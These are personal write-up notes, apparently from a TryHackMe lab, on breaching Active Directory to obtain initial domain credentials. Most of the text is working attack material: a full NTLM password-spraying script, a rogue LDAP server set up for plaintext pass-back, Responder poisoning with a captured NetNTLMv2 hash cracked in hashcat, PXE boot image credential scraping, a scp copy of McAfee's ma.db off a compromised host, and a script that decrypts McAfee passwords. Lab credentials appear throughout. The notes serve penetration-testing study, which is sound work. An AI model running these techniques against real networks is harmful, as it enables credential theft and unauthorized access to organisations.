# Breaching Active Directory
###### `Active Directory`
[TOC]
# Introduction
Active Directory (AD) is used by approximately 90% of the Global Fortune 1000 companies.
AD is use to Access Management and identity, it hold the all network key
AD is our attack prime goal after we get the initial access.
## Breaching Active Directory
Before we pwn the AD, we have to acquire an initial set of valid AD credentials.
Due to the number of AD server, we can find many attack surface for gaining an initial AD credentials.
So we have to find a account can authentication to AD, in other word, It's mean we can interact with the AD for next statement to enumerate the AD service
## Connecting to Network
## DNS configuration (`systemd-resolve`)
```
systemd-resolve --interface breachad --set-dns $THMDCIP --set-domain za.tryhackme.com
```
### interface:
sets DNS for specified interface 'breachead'
### set-dns:
$THMDCIP -> it presents Domain Name Server (In this case the dns i in the domain control)
Dns will resolve `za.tryhackme.com`, and map it to the IP address
```
systemd-resolve --interface breachad --set-dns 10.50.53.50 --set-domain za.tryhackme.com
```
To check whether the DNS work correctly ?
```
nslookup thmdc.za.tryhackme.com
```
### Kali Virtual Machine
Network Manager -> Advanced Network Configuration -> Your Connection -> IPv4 Settings
Set DNS IP here to the IP for THMDC
10.200.27.101
Restart the Network Management
```
systemctl restart NetworkManager
```
## Debuggin DNS
Because Kerberos is relay on DNS to create the tickets.
It's crucial to ensure that DNS is functioning correctly.
Note:
If we encounter issue with the tools not working
Checking the DNS configuration is essential.
### Debugging steps
Ping to Domain Controller to ensure network connectivity.
2 `nslookup tryhackme.com DC IP>`
if we can ping the DC but DNS is not working -> we need to Reset the network
# OSINT and phishing
## OSINT(open source intelligent)
- sensitive information on stack overflow
- Credential (Hard code) on github
- Credentials being disclosed in past breaches
https://www.dehashed.com/
## Phishing
PHishing allow us to entice the use to provide their credential
or ask them to run a specific application that would install remote access Trojan (RAT)
# NTLM authentication and service
NTLM (New Technology LAN management) is suite of secure protocol for authenticate user identity.
NTLM also could add request and response mechanism to authenticate use identity, we called as NetNTLM e.g.(http NTLMauth)
## HttpNTLMAuth - Password Spraying (Bypass Account limit)
Password Spraying technique is useful when we know the default password !
Authentication web application provides us an opportunity for us to attempt brute force to obtain the initial AD credentials
Most AD systems use account lock out to prevent repeat brute force attack.
### Circumvent Account lock out
We can employ password spray attack, This approach relay on OSINT to obtain the password, such as Default or onboarding password, to enumerate potential account that haven't modified the default password
A list of potential user accounts that can be identified using OSINT.
```
anthony.reynolds
samantha.thompson
dawn.turner
frances.chapman
henry.taylor
jennifer.wood
hollie.powell
louise.talbot
heather.smith
dominic.elliott
gordon.stevens
alan.jones
frank.fletcher
maria.sheppard
sophie.blackburn
dawn.hughes
henry.black
joanne.davies
mark.oconnor
georgina.edwards
```
Fqdn ->Fully Qualified Domain Name
Windows Authentication
UserName
```
domain\username
```
NetNTLM password spray_attack Script
```python=
#!/usr/bin/python3
import requests
from requests_ntlm import HttpNtlmAuth
import sys, getopt
class NTLMSprayer:
def __init__(self, fqdn):
self.HTTP_AUTH_FAILED_CODE = 401
self.HTTP_AUTH_SUCCEED_CODE = 200
self.verbose = True
self.fqdn = fqdn
def load_users(self, userfile):
self.users = []
lines = open(userfile, 'r').readlines()
for line in lines:
self.users.append(line.replace("\r", "").replace("\n", ""))
def password_spray(self, password, url):
print ("[*] Starting passwords spray attack using the following password: " + password)
count = 0
for user in self.users:
response = requests.get(url, auth=HttpNtlmAuth(self.fqdn + "\\" + user, password))
if (response.status_code == self.HTTP_AUTH_SUCCEED_CODE):
print ("[+] Valid credential pair found! Username: " + user + " Password: " + password)
count += 1
continue
if (self.verbose):
if (response.status_code == self.HTTP_AUTH_FAILED_CODE):
print ("[-] Failed login with Username: " + user)
print ("[*] Password spray attack completed, " + str(count) + " valid credential pairs found")
def main(argv):
userfile = ''
fqdn = ''
password = ''
attackurl = ''
try:
opts, args = getopt.getopt(argv, "hu:f:p:a:", ["userfile=", "fqdn=", "password=", "attackurl="])
except getopt.GetoptError:
print ("ntlm_passwordspray.py -u <userfile> -f <fqdn> -p <password> -a <attackurl>")
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print ("ntlm_passwordspray.py -u <userfile> -f <fqdn> -p <password> -a <attackurl>")
sys.exit()
elif opt in ("-u", "--userfile"):
userfile = str(arg)
elif opt in ("-f", "--fqdn"):
fqdn = str(arg)
elif opt in ("-p", "--password"):
password = str(arg)
elif opt in ("-a", "--attackurl"):
attackurl = str(arg)
if (len(userfile) > 0 and len(fqdn) > 0 and len(password) > 0 and len(attackurl) > 0):
#Start attack
sprayer = NTLMSprayer(fqdn)
sprayer.load_users(userfile)
sprayer.password_spray(password, attackurl)
sys.exit()
else:
print ("ntlm_passwordspray.py -u <userfile> -f <fqdn> -p <password> -a <attackurl>")
sys.exit(2)
if __name__ == "__main__":
main(sys.argv[1:])
```
```
┌──(root㉿kali)-[/home/kali/ActiveDirectoryPenetration]
└─# pip install requests_ntlm
```
```
┌──(root㉿kali)-[/home/kali/ActiveDirectoryPenetration]
└─# python NetNtlePasswordSpray.py -h
ntlm_passwordspray.py -u <userfile> -f <fqdn> -p <password> -a <attackurl>
```
```
usernaem:gordon.stevens
password:Changeme123
```
# LDAP Bind Credential
## LDAP Protocol
LDAP (lightweight Directory Access protocol) allow us to access the directory over the IP network
LDAP allow the application to access and modify the data in directory
Many Popular Third-part application utilize the LDAP to authentication
- Gitlab
- printer (!!!)
- Custom-developed web applications
- VPNs
Note:
In Some case ,such as gitlab, If we gain the foothold on host, we can easy to read the configuration file to recover the AD credential
## LDAP Passing-Back Attack
TO initial LDAP pass-back Attack
We have to gained the initial access to the internal network, such Using plugin malicious device and enter to internal network
## LAB - Printer LDAP Pass Attack
### Print Domain
```
┌──(kali㉿kali)-[~/Desktop]
└─$ nslookup printer.za.tryhackme.com
Server: 10.200.27.101
Address: 10.200.27.101#53
Name: printer.za.tryhackme.com
Address: 10.200.27.201
```
### Enumerate Target Service
```
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nmap -sS -sV -n 10.200.27.201 -F
```
HTTP 80 port
### Directory Enumerate
```
gobuster dir -u http://printer.za.tryhackme.com/ -w /usr/share/dirb/wordlists/common.txt -t 30
```
we can Modify the printer configuration to make it authenticate to us.
There some problems. Before the printer send credential, Before the printer sends credentials, it negotiates with the LDAP server and employs secure authentication methods
In some authentication mechanisms, credentials are not passed over the network or are encrypted.
To overcome this, we need to create an LDAP server with an insecure configuration that allows credentials to be transmitted in plain text.
### Hosting and Configure our malicious LDAP server
Install OpenLDAP:
```
apt-get update && sudo apt-get -y install slapd ldap-utils && sudo systemctl enable slapd
```
ReConfigure the our LDAP server:
```
dpkg-reconfigure -p low slapd
```
Domain
```
za.tryhackme.com
```
Any Administrator Password:
```
*********
```
Select MDB as the LDAP database to use:
Move old database files before a new one is created:
### Downgrading the authentication mechanism
PLAIN / LOGIN
LDIF -> lightweight directory interchange form file
```
#olcSaslSecProps.ldif
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred
```
- olcSaslSecProps -> SASL Simple Authentication Secure layer, Property ()
- **noanonymous:** Disables mechanisms that support anonymous login
- **minssf:** Specifies the minimum acceptable security strength with 0, meaning no protection.
### Apply the LDIF file to patch the LDAP server
```
ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restart
```
### Ensure the LDAP Server Only Supports PLAIN and LOGIN Authentication Methods
```
sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restart
```
### Capturing LDAP Credentials
```
sudo tcpdump -SX -i breachad tcp prot 389
```
Printer AD credential
```
tryhackme.com\svcLDAP
tryhackmeldappass1@
```
# Authentication Relay
Previous attack is testing web application with NTLM authentication with OSINT and password spray
In this case, we are going to testing utilize the NetNTLM SMB server
## SMB (server message block)
SMB allow the client communicate with the remote server for access share files
several vulnerability and exploit allow us to recover the credential or even gain code executing on the target
### Some Exploit For NetNTLM Authentication with SMB
- we can attempt to crack the NetNTLM challenge
- we also can plugin the rogue device to stage a man in the middle attack. Send the challenge which we receive form the client and capture the session key and application access permission
## Responder(MITM)
Responder is a tools that allows us to poison the any LLMNR, NBT-NS, WPAD packets detected
on LAN.
These protocol are used to local domain name resolution
### LLMNR
LLink-Local Multicast Name Resolution
LLMNR is protocol used to perform name resolution for the local network instead of querying the DNS server.
The reason for using LLMNR is to avoid the overburdening network resource such as the DNS server
---
NetBIOS name server (NBT-NS)
NBT-NS is the precursor protocol to LLMNR
WPAD protocol
WPAD reqeust try to find the web proxy for feature HTTP connections.
Those protocol are relay on the broadcast mechanism, we can use Responder to poisoned the response and force the target to communication with us, capturing those requests.
## LAB - MIMT NetNTLMv2 HASH(AD: username/password + challenge)
Although Responder captures victim traffic, this behavior is disruptive and has a chance of being detected.
By poisoning authentication requests, normal network authentication attempts would fail,
Configure Environment(Listener)
Create a new interface for Responder to listen:
https://github.com/lgandx/Responder
Install Responder
```
┌──(root㉿kali)-[/home/kali/Desktop]
└─# apt install responder
```
Usage:
responder -I eth0 -w -d
or:
responder -I eth0 -wd
```
sudo responder -I <interface>
```
```
[SMB] NTLMv2-SSP Client : 10.200.27.202
[SMB] NTLMv2-SSP Username : ZA\svcFileCopy
[SMB] NTLMv2-SSP Hash : svcFileCopy::ZA:a27d0fba551c412a:D1CE6091497E9D360D9C155E2F26734E:0101000000000000801B3B328A13DA01D37E4D7A761BA610000000000200080034004E0051004E0001001E00570049004E002D004D0036004F0037004C005A00570053004A005800460004003400570049004E002D004D0036004F0037004C005A00570053004A00580046002E0034004E0051004E002E004C004F00430041004C000300140034004E0051004E002E004C004F00430041004C000500140034004E0051004E002E004C004F00430041004C0007000800801B3B328A13DA01060004000200000008003000300000000000000000000000002000001BA4D755489471178710171C9C96AC30CBF9E2EFDDBEFD511F5A29DB8E5B6E9F0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00350030002E00320035002E00320038000000000000000000
```
```
hashcat --help | grep NTLMv2
```
```
hashcat -m 5600 <hash file> <password file> --force
```
-m ->Hash modes
AD credential
```
account: svcFileCopy
passowrd FPassword1!
```
## LAB-Relaying the Challenge
https://tryhackme.com/room/hololive
SKIP
## Microsoft Deployment Toolkit
In the Large organization, It's not possible to use USB or DVD to install the require software in every computer
Microsoft provide tool to do that, we can exploit misconfigurations in these tools to also breach AD
## MDT and SCCM
MDT: Microsoft Deployment Toolkit
it used to automating deployment of Microsoft Operation Systems
It allow the IT management deploy, update or remote the image in central location.
SCCM: System Center Configuration Management
Usually, MDT is integrate with SCCM
SCCM is used to manage all update for Microsoft application, services and operation systems.
MDT used to deploy new image, allowing IT team to preconfigure the boot image.
SCCM can be seen as Big brother to MDT, well SCCM does this type of patch management.
Any central management of infrastructure as MDT and SCCM can also be target by attacker
## PXE Boot
Preboot Execution Environment(PXE)
PXE is one of MDT configure way
TFTP
Trivial File transfer protocol
### PXE Exploit
we can attempt to inject the privilege vector ot gain the administrator once the PXE boot has been completed.
Perform password scraping attack to recover the AD credential use during the install.
## LAB-Password Scraping-MDT server
### PXE Boot image Retrieval
we have to send DHCP request, waiting received PXE boot preconfigure detail form DHCP
When we receive DHCP Offer
The First part of information is MDT server IP
And second part of information is BCD file
these file store information about PXE boot for different type of architecture.
BCD ->Binary Code Decimal
if we click this file
we could know the this website just a list and we can know we can download what PXE boot configuration file on the real MDT server
There probably is MDT information
### Enumerate and Retrieve the PXE boot image
Credential
```
ssh thm@THMJMP1.za.tryhackme.com
Password1@
```
```
thm@THMJMP1 C:\Users\thm>cd Documents
thm@THMJMP1 C:\Users\thm\Documents>mkdir meowhecker
thm@THMJMP1 C:\Users\thm\Documents>copy C:\powerpxe meowhecker\
C:\powerpxe\LICENSE
C:\powerpxe\PowerPXE.ps1
C:\powerpxe\README.md
3 file(s) copied.
```
```
thm@THMJMP1 C:\Users\thm\Documents>cd meowhecker
thm@THMJMP1 C:\Users\thm\Documents\meowhecker>dir
Volume in drive C is Windows
Volume Serial Number is 1634-22A9
Directory of C:\Users\thm\Documents\meowhecker
11/12/2023 02:12 AM <DIR> .
11/12/2023 02:12 AM <DIR> ..
03/03/2022 08:54 PM 1,098 LICENSE
03/03/2022 08:54 PM 98,573 PowerPXE.ps1
03/03/2022 08:54 PM 2,144 README.md
3 File(s) 101,815 bytes
2 Dir(s) 49,306,066,944 bytes free
```
Now have download the BCD file form the via the TFTP protocol,
TFTP can't list file, we have to know the BCP file accurate path.
Normally, BCP file will put on the /Tmp folder
we can using following command in our ssh session
10.200.27.202
Download BCD Configure file
```
tftp -i 10.200.27.202 GET "\Tmp\x64{88D21FF7-78FA-40BA-B77A-3F1FFCFC07D9}.bcd" conf.bcd
```
---
```
powershell -executionpolicy bypass
```
the option is allow us arbitrary execute any Scrip
Using Power PXE scrip to parse the BCD configure file to recover bootable image location
```
PS C:\Users\thm\Documents\meowhecker2> Import-Module .\PowerPXE.ps1
PS C:\Users\thm\Documents\meowhecker2> $BCDFile = "conf.bcd"
PS C:\Users\thm\Documents\meowhecker2> Get-WimFile -bcdFile $BCDFile
>> Parse the BCD file: conf.bcd
>>>> Identify wim file : \Boot\x64\Images\LiteTouchPE_x64.wim
\Boot\x64\Images\LiteTouchPE_x64.wim
```
win (windows imaging form)
win file are bootable image in windows
```
\Boot\x64\Images\LiteTouchPE_x64.wim
```
we can using TFTP to Download the images again
```
tftp -i 10.200.27.202 GET "\Boot\x64\Images\LiteTouchPE_x64.wim" pxeboot.wim
```
Now have have
### Recover Credential form a PXE boot image
PowerPXE script.ps1 (module)
```
Get-FindCredentials -WimFile pxeboot.wim
```
### Cleanup
(SKIP)
# Configure files
When we compromise a host on the organization
's network. One a valuable path is enumerate the configure file on the compromised host
Such as
- web application configure files
- server configure files
- Register Key
- Centrally deployed application configurations
GitHub Repository: [GhostPack/Seatbelt](https://github.com/GhostPack/Seatbelt)
## Configuration file credentials
In this task, our foucse is on Centrally deployed application with aim to recover the credential.
Typically, these application require a method for authentication to AD domain during the installation and execution.
### McAfee
McAfee is endpoint security application commond used in the Enterprise
During installation, MCAfee offten require AD credential to connect back orchestrator
There credentials are usually stored in ma.db.
As part of our post-compromise activeities, we can attempt to retrieve and access the ma.db file to recover Ad credentials with the McAfee installation.
## LAB-Configure File Exploit
Compromised Host
```
ssh thm@THMJMP1.za.tryhackme.com
Password1@
```
Default Configure file Path:
C:\ProgramData\McAfee\Agent\DB
```
thm@THMJMP1 C:\Users\thm>cd C:\ProgramData\McAfee\Agent\DB
```
We can use SCP command to copy the file to our local host
```
thm@THMJMP1 C:\ProgramData\McAfee\Agent\DB>scp ma.db kali@10.50.23.21:/home/k
ali/Desktop
```
->ma.db (Database file)
To read the database, we use a tool called splitebrowser
```
Domain:
za.tryhackme.com
Account: svcAV
Password: jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
```
### Password Decryption
https://github.com/funoverip/mcafee-sitelist-pwd-decryption
Sample Usage
Installed Library
```
pip install pycryptodome
```
Source Code
```python=
#!/usr/bin/env python
# Info:
# McAfee Sitelist.xml password decryption tool
# Jerome Nokin (@funoverip) - Feb 2016
# More info on https://funoverip.net/2016/02/mcafee-sitelist-xml-password-decryption/
#
# Quick howto:
# Search for the XML element <Password Encrypted="1">...</Password>,
# and paste the content as argument.
#
###########################################################################
import sys
import base64
from Crypto.Cipher import DES3
from Crypto.Hash import SHA
# hardcoded XOR key
KEY = bytearray.fromhex("12150F10111C1A060A1F1B1817160519").decode("utf-8")
def sitelist_xor(xs):
result = bytearray(0)
for i, c in enumerate(xs):
cb = c.to_bytes(1, byteorder="big")
result += (ord(cb) ^ ord(KEY[i%16])).to_bytes(1, byteorder="big")
return result
def des3_ecb_decrypt(data):
# hardcoded 3DES key
key = SHA.new(b'<!@#$%^>').digest() + bytearray(4)
# decrypt
des3 = DES3.new(key, DES3.MODE_ECB)
data += bytearray(64 - (len(data) % 64))
decrypted = des3.decrypt(data)
return decrypted[0:decrypted.find(0)] or "<empty>"
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: %s <base64 passwd>" % sys.argv[0])
print("Example: %s 'jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q=='" % sys.argv[0])
sys.exit(0)
# read arg
encrypted_password = base64.b64decode(bytes(sys.argv[1], "utf-8"))
# decrypt
passwdXOR = sitelist_xor(encrypted_password)
password = des3_ecb_decrypt(passwdXOR).decode("utf-8")
# print out
print("Crypted password : %s" % sys.argv[1])
print("Decrypted password : %s" % password)
sys.exit(0)
```
```
MyStrongPassword!
```
AD credentials
```
Account: svcAV
Password:MyStrongPassword!
```
Sign in with Wallet
Connect another wallet